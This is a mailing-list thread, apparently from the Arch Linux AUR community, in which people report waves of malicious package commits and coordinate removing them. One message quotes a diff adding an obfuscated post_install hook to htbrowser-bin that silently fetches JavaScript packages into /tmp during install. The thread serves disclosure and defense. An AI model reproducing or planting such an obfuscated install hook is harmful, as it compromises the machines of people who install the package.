Not really malicious per se, but not appropriate either, picked up by my detection bot: https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=gtk2%2bextra&id=424... https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=openspades&id=efbf6... https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=pg_vectorize&id=f2c... https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=unsf-git&id=6d2cb90... I assume there are more coming, those 4 for now. On Sun, 14 Jun 2026 at 11:30, Nicolas Boichat <nicolas@boichat.ch> wrote:
Those too -- but I can't see the malicious commits on HEAD so I assume somebody took action already. - https://aur.archlinux.org/cgit/aur.git/commit/?h=gulden-appimage&id=8188e584... - https://aur.archlinux.org/cgit/aur.git/commit/?h=hack-browser-data-git&id=19... - https://aur.archlinux.org/cgit/aur.git/commit/?h=kcmlaptop&id=ff8e6c657a4105...
On Sun, 14 Jun 2026 at 11:21, Nicolas Boichat <nicolas@boichat.ch> wrote:
There's a new wave (detected using my local Gemma E2B model FWIW).
It's a little bit more elaborate: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-bin&id=462c21877f...
diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install new file mode 100644 index 000000000000..9806501accad --- /dev/null +++ b/htbrowser-bin-deps.install @@ -0,0 +1,3 @@ +post_install() { + $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s' +}
On Fri, 12 Jun 2026 at 01:47, Jonathan Grotelüschen <tippfehlr@archlinux.org> wrote:
Hi everyone,
we’re working hard to reset/delete all malicious commits and ban the accounts.
If you find more malicious packages, please **send them as a reply to this email** to keep them all in one thread.
Thanks!
-- tippfehlr